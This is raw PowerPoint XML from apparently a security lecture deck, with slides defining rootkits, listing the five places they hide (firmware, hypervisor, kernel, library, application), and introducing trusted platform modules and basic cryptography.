            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Rootkits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1917700"/>
            <a:ext cx="8305800" cy="4367213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469900" marR="0" lvl="0" indent="-469900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is a program that conceals</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> its existence, even in the face of determined efforts by the owner to locate and remove it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="0" lvl="0" indent="-469900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> be virus, worm or spyware</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0"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bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="0"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7227371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0" y="334296"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Types of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Rootkits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="422787" y="1730477"/>
            <a:ext cx="8150941" cy="4687529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(a) Firmware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rootkits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1066800" lvl="1" indent="-609600" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hidden in BIOS and get control upon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bootup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(b) Hypervisor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rootkits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1066800" lvl="1" indent="-609600" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hidden in virtual machine hypervisor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(c)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rootkits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1066800" lvl="1" indent="-609600" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hidden in OS kernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(d) Library </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rootkits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1066800" lvl="1" indent="-609600" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hidden in system libraries like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(e) Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rootkits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1066800" lvl="1" indent="-609600" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hidden in application-created files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1066800" lvl="1" indent="-609600" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10264694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0" y="5715000"/>
            <a:ext cx="9144000" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Figure 9-30. Five places a rootkit can hide.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108547"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r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Types of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Rootkits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108550" name="Picture 6" descr="D:\b\b4\IBM\09-30.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="433388" y="1695450"/>
            <a:ext cx="8277225" cy="3467100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21637773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ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Trusted Platform Modules</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43978029-9DF7-7445-88EF-08A8BCC03D5B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Two Types of Platforms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1461154"/>
            <a:ext cx="9144000" cy="4787245"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Open platform (e.g. PC, PDA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>General purpose computing platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>No a priori trust with third party</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Closed platform (e.g. ATM, set-top box, game console, satellite receiver)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Special purpose computing device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Can authenticate itself to a remote party using a secret key and ensure well-behaved operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Hardware tamper resistance to protect the secret key (embedded by manufacturer)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ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Goal: keep information from those who aren’t supposed to see it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do this by “scrambling” the data with an algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Algorithm has two inputs: data &amp; key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Key is known only to “authorized” users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cracking codes is very difficult</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Algorithm should be public</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Relying upon the secrecy of the algorithm is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>very bad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>idea</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B9C31318-8D1F-46D0-AD3E-FD5CE0C4604B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>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dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
